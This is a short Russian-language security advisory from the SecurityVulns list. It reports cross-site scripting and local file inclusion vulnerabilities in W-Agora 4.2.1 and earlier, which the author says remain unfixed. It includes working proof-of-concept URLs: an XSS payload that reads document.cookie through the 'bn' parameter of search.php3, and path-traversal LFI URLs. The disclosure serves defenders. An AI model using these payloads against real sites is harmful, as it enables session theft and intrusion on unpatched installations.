SecurityvulnsSECURITYVULNS:DOC:24985Уязвимости в W-Agora
Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Cross-Site Scripting и
Local File Inclusion уязвимостях в W-Agora.
XSS (WASC-08):
http://site/news/search.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
Local File Inclusion (WASC-31):
Можно инклюдить php-файлы (с расширением php3 в версии
W-Agora 4.1.5 или с расширением php в версии 4.2.1).
В папке conf:
http://site/news/search.php3?bn=1
В любой папке (только на Windows-серверах):
http://site/news/search.php3?bn=..\1
Уязвимы W-Agora 4.2.1 и предыдущие версии. В последних
версиях системы search.php3 имеет имя search.php.
Разработчик системы данные уязвимости не исправил.
Дополнительная информация о данных уязвимостях у меня на
сайте:
http://websecurity.com.ua/4481/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua